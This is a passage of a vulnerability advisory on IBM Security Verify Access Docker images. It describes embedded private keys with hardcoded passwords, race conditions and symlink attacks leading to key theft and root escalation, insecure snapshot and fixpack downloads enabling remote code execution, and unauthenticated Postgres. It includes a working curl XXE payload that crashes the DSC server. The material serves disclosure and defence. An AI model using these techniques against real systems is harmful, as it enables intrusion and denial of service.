44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE \n        2.16.840.1.113894.746875.1.1: \u003cUnsupported tag 6\u003e\n    subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n    issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA\n    -----BEGIN CERTIFICATE-----\n    MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh\n    MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3\n    d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD\n    QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT\n    MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j\n    b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG\n    9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB\n    CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97\n    nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt\n    43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P\n    T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4\n    gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO\n    BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR\n    TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw\n    DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr\n    hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg\n    06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF\n    PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls\n    YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk\n    CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=\n    -----END CERTIFICATE-----\n    Certificate bag\n    Bag Attributes\n        friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US\n    [...]\n\nWhen auditing live installations, the decrypted `lmi_trust_store.p12` file will contain the private key of the isam CA. \n\n    kali% openssl x509 -in crt.pem -text -noout -modulus\n    Certificate:\n        Data:\n            Version: 3 (0x2)\n            Serial Number: 14004578023842938\n            Signature Algorithm: sha256WithRSAEncryption\n            Issuer: C = us, O = ibm, CN = isam\n            Validity\n                Not Before: Sep 19 07:01:51 2022 GMT\n                Not After : Sep 17 07:01:51 2032 GMT\n            Subject: C = us, O = ibm, CN = isam\n    [...]\n    Modulus=C8B3[REDACTED]\n    \n    kali% openssl rsa -in crt.key -modulus               \n    Enter pass phrase for crt.key:\n    Modulus=C8B3[REDACTED]\n    writing RSA key\n    -----BEGIN PRIVATE KEY-----\n    [REDACTED]\n    -----END PRIVATE KEY-----\n\nIt is also possible to decrypt the `embedded_ldap_keys.p12` file:\n\n    kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword \n    MAC: sha1, Iteration 1024       \n    MAC length: 20, salt length: 8\n    PKCS7 Data\n    Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5\n    Bag Attributes\n        friendlyName: server\n        localKeyID: [REDACTED]\n    Key Attributes: \u003cNo Attributes\u003e\n    Enter PEM pass phrase: [password]\n    Verifying - Enter PEM pass phrase: [password]\n    -----BEGIN ENCRYPTED PRIVATE KEY-----\n    [REDACTED]\n    -----END ENCRYPTED PRIVATE KEY-----\n    PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024\n    Certificate bag\n    Bag Attributes\n        friendlyName: server\n        localKeyID: [REDACTED]\n    subject=C = us, O = ibm, CN = isam\n    issuer=C = us, O = ibm, CN = isam\n    -----BEGIN CERTIFICATE-----\n    [REDACTED]\n    -----END CERTIFICATE-----\n    kali-docker#\n\nUsing a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using `IBM Crypto For C` and OpenSSL. \n\n    kali-docker# pwd                                            \n    /home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab\n    kali-docker# ls -la\n    total 492\n    drwxr-x---  2 root root   4096 Oct 18 05:13 . \n    drwxr-x--- 16 root root   4096 Sep 20 03:01 .. \n    -rw-r-----  1 root root   2952 Sep 20 03:01 embedded_ldap_keys.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 embedded_ldap_keys.sth\n    -rw-r-----  1 root root  47630 Sep 20 03:09 lmi_trust_store.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 lmi_trust_store.sth\n    -rw-r-----  1 root root 109313 Sep 20 03:17 rt_profile_keys.p12\n    -rw-r-----  1 root root    193 Jun  8 01:31 rt_profile_keys.sth\n    [...]\n\n\n\n## Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information. \n\nThe `/usr/sbin/bootstrap.sh` script will generate temporary files using the default umask (`022`). \n\nIn the `build_health_check_config()` function found inside the `/usr/sbin/bootstrap.sh` script (executed when the instance starts), we can see that several files are generated:\n\n- - /tmp/health_check.p12\n- - /var/dsc/.health/port.txt\n\nContent of `/usr/sbin/bootstrap.sh`:\n\n[code:shell]\n 65 #############################################################################\n 66 # Construct the health check configuration information.  This will include\n 67 # the port and client certificate information. \n 68 \n 69 build_health_check_config()\n 70 {\n 71     if [ -z \"$INSTANCE\" ] ; then\n 72         INSTANCE=1\n 73     fi\n 74 \n 75     conf=/var/dsc/etc/dsc.conf.${INSTANCE}\n 76 \n 77     if [ ! -f ${conf} ] ; then\n 78         Echo 973 \"${INSTANCE}\"\n 79         exit 1\n 80     fi\n 81 \n 82     #\n 83     # Determine the port which is to be used. \n 84     #\n 85 \n 86     port=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n 87                 dsess-server ssl-listen-port`\n 88 \n 89     mkdir -p /var/dsc/.health\n 90 \n 91     echo $port \u003e /var/dsc/.health/port.txt\n 92 \n 93     #\n 94     # Extract the client certificate which is used to communicate with the\n 95     # server. \n 96     #\n 97 \n 98     cert_file=/var/dsc/.health/health_check.pem\n 99 \n100     tmp_p12=/tmp/health_check.p12\n101     tmp_pwd=health_check\n102 \n103     # Work out the name of the key file which is being used. \n104     key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf getentry \\\n105                 dsess-server ssl-keyfile`\n106 \n107     # Export the key into a key database type which is supported\n108     # by OpenSSL. \n109     gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n110             -target $tmp_p12 -target_pw $tmp_pwd\n111 \n112     # Convert the key into something that curl understands. \n113     openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n114             -passin pass:$tmp_pwd 2\u003e/dev/null\n115 \n116     # Tidy up. \n117     rm -f $tmp_p12\n118 }\n119\n[...]\n176 #\n177 # Extract the health check information. \n178 #\n179 \n180 build_health_check_config\n[/code]\n\nThe temporary file `/tmp/health_check.p12` contains the private keys of the dsc server and the dsc client. This key file is stored using the `644` permissions allowing any local attacker to extract these keys when the Docker image starts. \n\nFurthermore, the password of the certificate file is hardcoded (to `health_check`, on line 101). \n\nWhen checking the files generated by this script, we can confirm the files are world-readable. For example, for the `/var/dsc/.health/port.txt` file, the permissions are 644:\n\n    [isam@verify-access-dsc /]$ ls -la /var/dsc/.health/\n    total 28\n    drwxr-xr-x 2 isam isam 4096 Oct  4 09:07 . \n    drwxrwx--- 1 isam root 4096 Oct  4 09:07 ..     \n    -rw------- 1 isam isam 9268 Oct  4 09:07 health_check.pem\n    -rw-r--r-- 1 isam isam    5 Oct  4 09:07 port.txt\n    [isam@verify-access-dsc /]$\n\n\nThere is a race condition in the `/usr/sbin/bootstrap.sh` script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts. \n\nThe filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n\nIt was observed that the Docker image verify-access runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store sensitive information. Since this script uses the default umask (`022`), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients. \n\nThe `/tmp/health_check.pem` output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n[...]\n65 cert_file=/tmp/health_check.pem\n66 \n67 trap \"rm -f $result_file $error_file $hdr_file\" EXIT\n68 \n69 # The following function will extract a key which can be used to authenticate\n70 # to the DSC. \n71 \n72 extract_dsc_key()\n73 {\n74     if [ ! -f $cert_file ] ; then\n75         tmp_p12=/tmp/health_check.p12.$$\n76         tmp_pwd=health_check\n77 \n78         # Work out the name of the DSC configuration file. \n79         conf_file=`mesa_config wga.ftype dir dsc.conf -production`\n80 \n81         # Work out the name of the key file which is being used. \n82         key_file=`/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \\\n83                 dsess-server ssl-keyfile`\n84 \n85         # Export the key into a key database type which is supported\n86         # by OpenSSL. \n87         gsk8capicmd_64 -cert -export -db $key_file -stashed \\\n88             -target $tmp_p12 -target_pw $tmp_pwd\n89 \n90         # Convert the key into something that curl understands. \n91         openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \\\n92             -passin pass:$tmp_pwd 2\u003e/dev/null\n93 \n94         # Tidy up. \n95         rm -f $tmp_p12\n96     fi\n97 }\n[...]\n[/code]\n\nThe file `/tmp/health_check.p12.$$` (`$$` corresponding to the local PID) will be generated with the password `health_check` and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client. \n\nThe filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the `/usr/sbin/health_check.sh` script but the ownership of the file will still belong to an attacker, allowing extracting the private keys. \n\nThere is also a leak of private keys in the world-readable file `/tmp/health_check.pem`. \n\nThe password is hardcoded. \n\nInsecure permissions are used for sensitive files. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n\nIt was observed that the Docker image verify-access regularly runs the script `/usr/sbin/health_check.sh`. \n\nThis script uses curl, without checking the remote SSL certificate:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n190 #\n191 # Make the curl request. \n192 #\n193 \n194 eval curl --insecure --output $result_file --silent --show-error \\\n195         -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n196\n[/code]\n\nThe eval instruction does not seem exploitable. \n\nThis script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside `/tmp`:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n 62 result_file=/tmp/health_check.out.$$\n 63 error_file=/tmp/health_check.err.$$\n[...]\n194 eval curl --insecure --output $result_file --silent --show-error \\\n195         -D $hdr_file $extra_args https://127.0.0.1:$port 2\u003e $error_file\n[/code]\n\n\nThe `/tmp/health_check.out.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root. \n\nThe script trusts any insecure HTTPS server, due to the use of the `--insecure` flag in curl. \n\nThere are two uses of insecure files in the `/usr/sbin/health_check.sh` script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root. \n\nThe filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the `/usr/sbin/health_check.sh` script. \n\n\n\n## Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n\nIt was observed that the Docker image verify-access-sc runs regularly the script `/usr/sbin/health_check.sh`. \n\nThis script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link. \n\nFurthermore, the script uses insecure options for curl on line 73 (`--insecure`) - the SSL certificate of the remote host will not be validated:\n\nContent of `/usr/sbin/health_check.sh`:\n\n[code:shell]\n62 #\n63 # Test access to the server as this will govern whether we are healthy or\n64 # not. \n65 #\n66 \n67 error_file=/tmp/health_check.err.$$\n68 \n69 trap \"rm -f $error_file\" EXIT\n70 \n71 ping_body=\u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/X    MLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n72 \n73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \\\n74         -H \u0027SOAPAction: \"ping\"\u0027 \\\n75         --data \"$ping_body\" \\\n76         https://127.0.0.1:$port 2\u003e $error_file\n77 \n78 if [ $? -ne 0 ] ; then\n79     #\n80     # We don\u0027t know for sure yet whether the DSC is alive or not because it\n81     # could be passive (only a single DSC is active in an environment at any\n82     # one time).  So, we also need to try a simple SSL connection before we\n83     # return that the server is actually unhealthy.  We could have simply\n84     # avoided the initial curl call, but by only performing the SSL connection\n85     # test when the DSC is passive we avoid SSL error messages being displayed\n86     # on the console. \n87     #\n88 \n89     openssl s_client -connect 127.0.0.1:$port 2\u003e\u00261 | grep -q CONNECTED\n90 \n91     if [ $? -eq 0 ] ; then\n92         exit 0\n93     fi\n94 \n95     echo \"Error\u003e failed to connect to the service.\"\n96 \n97     cat $error_file; rm -f $cert_file\n[/code]\n\nThe `/tmp/health_check.err.$$` file (`$$` corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root. \n\nThere is a race condition in the `/usr/sbin/health_check.sh` script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root. \n\nThe filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command. \n\n\n\n## Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n\nIt was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system. \n\nThe `/usr/sbin/.bootstrap_common.sh` script is executed from the `/usr/sbin/bootstrap.sh` script when the instance starts:\n\nContent of `/usr/sbin/bootstrap.sh` in verify-access-dsc\n\n[code:shell]\n139 #\n140 # Wait for the snapshot file. \n141 #\n142 \n143 wait_for_snapshot\n[/code]\n\nIn verify-access-runtime, the function `wait_for_snapshot()` is called on line 93 inside the `/usr/sbin/bootstrap.sh` script. \n\nThe function `wait_for_snapshot()` calls the function `download_from_cfgsvc()` (line 251):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n240 #############################################################################\n241 # Wait for the snapshot file. \n242 \n243 wait_for_snapshot()\n244 {\n245     download_from_cfgsvc 1\n246 \n247     if [ ! -f $snapshot ] ; then\n248         Echo 969\n249 \n250         while [ ! -f $snapshot ] ; do\n251             download_from_cfgsvc 0\n252 \n253             if [ ! -f $snapshot ] ; then\n254                 sleep 1\n255             fi\n256         done\n257 \n258         Echo 970\n259     fi\n260 }\n[/code]\n\nAnd the function `download_from_cfgsvc()` uses curl to download a snapshot, without checking the SSL certificate of the remote server. The `-k` option (also known as `--insecure`) disables any SSL verification (line 154):\n\nContent `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n140 download_from_cfgsvc()\n141 {\n142     # No need to download the snapshot if the configuration service has not\n143     # been defined. \n144     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n145         return\n146     fi\n147 \n148     if [ $1 -eq 1 ] ; then\n149         Echo 960\n150     fi\n151 \n152     snapshotUri=\"`basename $snapshot`?type=File\u0026client=`cat /etc/hostname`\"\n153 \n154     curl -k -s --fail -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n155         \"$CONFIG_SERVICE_URL/snapshots/$snapshotUri\" \\\n156             -o $snapshot\n157 \n158     if [ $? -ne 0 ] ; then\n159         if [ $1 -eq 1 ] ; then\n160             Echo 961\n161         fi\n162 \n163         rm -f $snapshot\n164     else\n165         Echo 962\n166     fi\n167 }\n[/code]\n\n- From the curl(1) man page:\n\n           -k, --insecure\n                  (TLS) By default, every SSL connection curl makes is verified to\n                  be secure. This option allows curl to proceed and operate even\n                  for server connections otherwise considered insecure. \n    \n                  The server connection is verified by making sure the server\u0027s\n                  certificate contains the right name and verifies successfully\n                  using the cert store. \n    \n                  See this online resource for further details:\n                   https://curl.haxx.se/docs/sslcerts.html\n    \n                  See also --proxy-insecure and --cacert. \n\nThe same issue exists with the function `download_fixpacks()` in the same shell script (line 201):\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n169 #############################################################################\n170 # Attempt to download any requested fixpacks from the configuration service. \n171 \n172 download_fixpacks()\n173 {\n174     # No need to download the fixpacks if the configuration service has not\n175     # been defined. \n176     if [ -z \"$CONFIG_SERVICE_URL\" ] ; then\n177         return\n178     fi\n179 \n180     # No need to download the fixpacks if no fixpack has been specified, or\n181     # if the fixpack has been set to \u0027disabled\u0027. \n182     if [ -z \"${FIXPACKS}\" -o \"${FIXPACKS}\" = \"disabled\" ]; then\n183         return\n184     fi\n185 \n186     # Set the fixpack directory, and then ensure that the fixpack directory\n187     # has been created. \n188     fixpack_dir=/tmp/fixpacks\n189 \n190     if [ -d $fixpack_dir ] ; then\n191         rm -rf $fixpack_dir/*\n192     else\n193         mkdir -p $fixpack_dir\n194     fi\n195 \n196     # If we get this far we know that one or more fixpacks have been specified. \n197     # We need to download each of these now. \n198     for fixpack in $FIXPACKS; do\n199         fixpackUri=\"$fixpack?type=File\u0026client=`cat /etc/hostname`\"\n200 \n201         curl -k -s --fail \\\n202             -u \"$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD\" \\\n203             \"$CONFIG_SERVICE_URL/fixpacks/$fixpackUri\" \\\n204             -o $fixpack_dir/$fixpack\n[/code]\n\nThe fixpacks will be then installed as root inside the image:\n\nContent of `/usr/sbin/.bootstrap_common.sh` in verify-access-dsc, verify-access-runtime and verify-access-wrp:\n\n[code:shell]\n231     for fixpack in $FIXPACKS; do\n232         Echo 967 \"${fixpack}\"\n233         /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} \u003e/dev/null\n234         if [ $? -ne 0 ]; then\n235             Echo 968 \"${fixpack}\"\n236         fi\n[/code]\n\nAn attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform. \n\n\n\n## Details - Lack of authentication in Postgres inside verify-access-runtime\n\nIt was observed that the Docker image verify-access-runtime configures Postgres without authentication. \n\nThe `/usr/sbin/bootstrap.sh` script configures and starts the postgres daemon. We can see the lack of authentication:\n\n[code:shell]\n135 #\n136 # Start the postgresql server. \n137 #\n138 \n139 Echo 974\n140 \n141 db_root=/var/postgresql/config\n142 db_data_root=$db_root/data\n143 db_snapshot=$db_root/snapshot.sql\n144 db_log_dir=/var/application.logs/db/config\n145 db_port=5432\n146 db_name=config\n147 db_user=www-data\n148 \n149 if [ ! -f $db_snapshot ] ; then\n150     Echo 975\n151     exit 1\n152 fi\n153 \n154 mkdir -p $db_log_dir\n155 \n156 rm -rf $db_data_root\n157 \n158 initdb -D $db_data_root --locale=C -U $db_user -A trust \u003e /dev/null\n159 \n160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start\n161 \n162 createdb -U $db_user -p $db_port -w $db_name \u003e /dev/null\n163 \n164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name \u003e /dev/null\n165\n[/code]\n\nA local attacker can compromise the postgres database. \n\n\n\n## Details - Null pointer dereference in dscd - Remote DoS against DSC instances\n\nIt was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure. \n\nThe DSC servers are reachable using the `/DSess/services/DSess` API running on port 8443/tcp. \n\nUsing an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:\n\n    [user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443\n    * Rebuilt URL to: https://dsc-02.test.lan:8443/\n    *   Trying 10.0.0.16... \n    * TCP_NODELAY set\n    * Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)\n    * ALPN, offering h2\n    * ALPN, offering http/1.1\n    * successfully set certificate verify locations:\n    *   CAfile: /etc/pki/tls/certs/ca-bundle.crt\n      CApath: none\n    * TLSv1.3 (OUT), TLS handshake, Client hello (1):\n    * TLSv1.3 (IN), TLS handshake, Server hello (2):\n    * TLSv1.2 (IN), TLS handshake, Certificate (11):\n    * TLSv1.2 (IN), TLS handshake, Request CERT (13):\n    * TLSv1.2 (IN), TLS handshake, Server finished (14):\n    * TLSv1.2 (OUT), TLS handshake, Certificate (11):\n    * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n    * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n    * TLSv1.2 (OUT), TLS handshake, Finished (20):\n    * TLSv1.2 (IN), TLS alert, handshake failure (552):\n    * error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n    * Closing connection 0\n    curl: (35) error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure\n\nWith a client certificate, we can reach the `/DSess/services/DSess` API:\n\nSending a normal request (ping):\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n    \u003c?xml version=\u00271.0\u0027 encoding=\u0027utf-8\u0027 ?\u003e\n    \u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\n    \u003cSOAP-ENV:Body\u003e\n    \u003cns1:pingResponse xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\n    \u003cns1:pingReturn\u003e952467756\u003c/ns1:pingReturn\u003e\n    \u003c/ns1:pingResponse\u003e\n    \u003c/SOAP-ENV:Body\u003e\n    \u003c/SOAP-ENV:Envelope\u003e\n\nWe can also send a specific XML External Entity (XXE) that will crash the remote DSC instance:\n\n    kali% curl --key dsc-client.key --cert dsc-client.pem --show-error --insecure https://dsc-02.test.lan:8443/DSess/services/DSess -X POST -H \u0027SOAPAction: \"ping\"\u0027 --data \u0027\u003c?xml version=\"1.0\" encoding=\"utf-8\" ?\u003e\u003c!DOCTYPE foo [ \u003c!ELEMENT foo ANY \u003e \u003c!ENTITY xxe SYSTEM \"file:///dev/random\"\u003e]\u003e\u003cSOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\u003e\u003cSOAP-ENV:Body\u003e\u003cns1:ping xmlns:ns1=\"http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/SOAP-ENV:Body\u003e\u003c/SOAP-ENV:Envelope\u003e\u0027\n    curl: (52) Empty reply from server\n\n\nWhen debugging this issue, it appears there is a null pointer dereference in the method `DSessWrapper::ping(void*) ()` defined in `/lib64/libamdsc_interface.so` library:\n\n    [root@container-02]# ps -auxww | grep dscd\n    6000     2093037  3.4  0.5 427936 40884 ?        Ssl  20:07   0:00 /opt/dsc/bin/dscd -c /var/dsc/etc/dsc.conf.1 -f -j\n    root     2093269  0.0  0.0  12140  1092 pts/0    S+   20:07   0:00 grep --color=auto dscd\n    [root@container-02]# gdb -p 2093037\n    [...]\n    (gdb) c\n    Continuing. \n    [----------------------------------registers-----------------------------------]\n    RAX: 0x0 \n    RBX: 0x7fec38006110 --\u003e 0x7fecaf4df160 --\u003e 0x7fecaf280e20 --\u003e 0x4100261081058b48 \n    RCX: 0x7fec38000b60 --\u003e 0x1000100030005 \n    RDX: 0x7fec38025900 --\u003e 0x7fec38021c90 --\u003e 0x7fec38026230 --\u003e 0x7fec38025dc0 --\u003e 0x0 \n    RSI: 0x4 \n    RDI: 0x0 \n    RBP: 0x7fec2804f7c0 --\u003e 0x7fecb0297548 --\u003e 0x7fecb0079560 --\u003e 0x480021e921058b48 \n    RSP: 0x7feca642fc10 --\u003e 0x1d2e480 --\u003e 0x7fecaf4dfbf8 --\u003e 0x7fecaf292870 --\u003e 0x410024f509058b48 \n    RIP: 0x7fecb007a595 --\u003e 0x48ffffca04e8188b \n    R8 : 0x7fec38000b74 --\u003e 0x3000600060005 \n    R9 : 0x4 \n    R10: 0x2f (\u0027/\u0027)\n    R11: 0x7fecaabb2674 --\u003e 0x29058b48fb894853 \n    R12: 0xffffffff \n    R13: 0x7feca642fca0 --\u003e 0x7fec380312f0 (\"/DSess/services/DSess\")\n    R14: 0x7feca642fce0 --\u003e 0x7feca642fcf0 --\u003e 0x7f00676e6970 \n    R15: 0x0\n    EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n    [-------------------------------------code-------------------------------------]\n       0x7fecb007a58a \u003c_ZN12DSessWrapper4pingEPv+154\u003e:      call   QWORD PTR [rax+0x38]\n       0x7fecb007a58d \u003c_ZN12DSessWrapper4pingEPv+157\u003e:      mov    esi,0x4\n       0x7fecb007a592 \u003c_ZN12DSessWrapper4pingEPv+162\u003e:      mov    rdi,rax\n    =\u003e 0x7fecb007a595 \u003c_ZN12DSessWrapper4pingEPv+165\u003e:      mov    ebx,DWORD PTR [rax]\n       0x7fecb007a597 \u003c_ZN12DSessWrapper4pingEPv+167\u003e:      call   0x7fecb0076fa0 \u003c_ZdlPvm@plt\u003e\n       0x7fecb007a59c 